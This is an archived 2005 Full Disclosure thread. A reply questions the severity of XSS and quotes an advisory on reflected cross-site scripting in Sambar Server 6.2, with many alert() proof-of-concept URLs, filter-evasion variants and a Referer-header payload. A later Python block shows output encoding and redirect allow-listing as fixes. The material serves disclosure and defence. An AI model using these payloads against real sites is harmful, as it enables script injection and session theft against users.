Full Disclosure mailing list archives
Re: XSS in Sambar Server version 6.2
From: Daniel <deeper () gmail com>
Date: Tue, 24 May 2005 15:44:39 +0100
"A user can input a specially crafted script that when rendered by the application..." Hopefully you can explain: - Is the user required to be logged in first, or can this be done unauthenticated - Are you able to steal any aspect of the session management logic using this method - Are you able to, in any way, gain access to the sambar installation using this technique? I have issues with any XSS security research being more than a low risk, unless you can modify the logic of the application or gain access to the platform in question. Automated scanning tools love XSS issues as they are easy to find, but in reality bloody hard to exploit (wow, i have made a jscript window popup) ps, its not a personal attack, just me failing to understand the logic of XSS attacks (hell its like 1999 when responding to ICMP packets was seen as a risk) On 5/23/05, jamie fisher <contact_jamie_fisher () yahoo co uk> wrote:
- Sambar -

AFFECTED PRODUCTS:
==================
Sambar Server 6.2
http://www.sambar.com/

OVERVIEW:
=========
Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC, Syslog, Proxy and FTP server.

HISTORY:
========
17th April 2005 - First discovered
17th April 2005 - Contacted vendor
20th April 2005 - Vendor reply
20th May 2005 - Patch available

DETAILS:
========
Multiple XSS found in the administrative interface. In some instances Sambar Server version 6.2 does not correctly filter HTML code from user-supplied input. A user can input a specially crafted script that, when rendered by the application, will cause arbitrary scripting to be executed by the user's browser. The code will originate from the site running the Sambar Server version 6.2 software and will run in the security context of that site.

ISSUE:
======
Crafted input causes the application to output what is known as a Cross Site Script. The script is rendered upon visitation to the affected page served by the application.

EXAMPLE:
========

Standard XSS within the /search directory:
==========================================
1. http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name
2. http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name
3. http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name
4. http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name
5. http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name
6. http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name
7. http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name
8. http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name
9. http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name
10. http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name
11. http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name
12. http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name

Standard XSS within the /session directory:
===========================================
1. http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script>
2. http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script>
3. http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>

HTML XSS within the /search directory:
======================================
1. http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name
2. http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name
3. http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name
4. http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name
5. http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name
6. http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name

No chevron '<' '>' XSS within the /search directory:
====================================================
1. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name
2. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name
3. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name
4. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name
5. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name
6. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name

Escaping from HTML XSS within the /session directory:
====================================================
1. http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script>

Including XSS within referrer:
==============================
1.
GET /CheckingXssInReferer.html HTTP/1.0
Cookie: RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=; RCslb=5; RCrelogin=false
Host: 192.168.0.5
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Referer: "></a><script>alert('XSS')</script>

SOLUTION:
=========
Sambar Server has been contacted and has released patches.

Note: There were probably a lot more input validation errors but due to a whining girlfriend work had to be cut short :)

REFERENCE:
==========
http://www.sambar.com/security.htm
http://homepage.hispeed.ch/spamtrap/sambar62p.exe

CREDITS:
========
Tod Sambar for understanding the issue and resolving in a timely manner.

This vulnerability was discovered and researched by Jamie Fisher
mail: contact_jamie_fisher[at]yahoo.co.uk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
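The advisory lists the request URLs but not the fix, which for the /search vectors is contextual output encoding of the reflected parameter. This is an added Python example, not Sambar's code or part of the advisory: it decodes three of the request URLs above, shows that reflecting indexname verbatim into an HTML attribute (an assumed context; the advisory does not show Sambar's template) is injectable for every shape (tag, entity-encoded javascript: URI, and the no-chevron style attribute), that attribute encoding neutralises all three, and why the RCredirect value, being used as a URL, needs allow-listing rather than encoding.

```python
import html
from urllib.parse import unquote_plus, urlparse

# Assumed reflection point; the advisory does not show Sambar's own markup.
ATTR_TEMPLATE = '<input type="hidden" name="indexname" value="%s">'

# Three of the advisory's own request URLs, one per injection shape.
ADVISORY_URLS = [
    'http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%20name',
    'http://192.168.0.5/search/results.stm?indexname=>"\'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name',
    'http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name',
]

def indexname_from_url(url):
    """Decode the indexname query parameter as the server would see it."""
    for pair in urlparse(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "indexname":
            return unquote_plus(value)
    return ""

def render_unsafe(value):
    """The vulnerable pattern: the decoded parameter is reflected verbatim."""
    return ATTR_TEMPLATE % value

def render_safe(value):
    """The fix for an attribute context: encode & < > " and ' so the value can
    neither close the quoted attribute nor open a tag. The entity-encoded
    javascript: vector becomes &amp;#x6a;... and stays inert text."""
    return ATTR_TEMPLATE % html.escape(value, quote=True)

def still_injectable(rendered):
    """True if the reflected part of the markup can end the attribute or
    start a tag, i.e. the output is still vulnerable."""
    prefix, suffix = ATTR_TEMPLATE.split("%s")
    reflected = rendered[len(prefix):len(rendered) - len(suffix)]
    return any(c in reflected for c in '<>"\'')

def audit(urls):
    """Per URL: (injectable when reflected verbatim, injectable after the fix)."""
    return [(still_injectable(render_unsafe(indexname_from_url(u))),
             still_injectable(render_safe(indexname_from_url(u)))) for u in urls]

def safe_redirect_target(value):
    """RCredirect is used as a URL, so encoding is not enough: accept only a
    site-local absolute path, which rules out markup, javascript: URLs and
    off-site redirects alike. Returns None when the value is rejected."""
    parsed = urlparse(value)
    if parsed.scheme or parsed.netloc or not value.startswith("/") or value.startswith("//"):
        return None
    if any(c in value for c in '<>"\'\\\r\n'):
        return None
    return value
```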
Current thread:
- XSS in Sambar Server version 6.2 jamie fisher (May 23)
- Re: XSS in Sambar Server version 6.2 Daniel (May 24)
- Re: XSS in Sambar Server version 6.2 jamie fisher (May 24)
- Re: XSS in Sambar Server version 6.2 Daniel (May 25)
- Re: XSS in Sambar Server version 6.2 jamie fisher (May 24)
- Re: XSS in Sambar Server version 6.2 Daniel (May 24)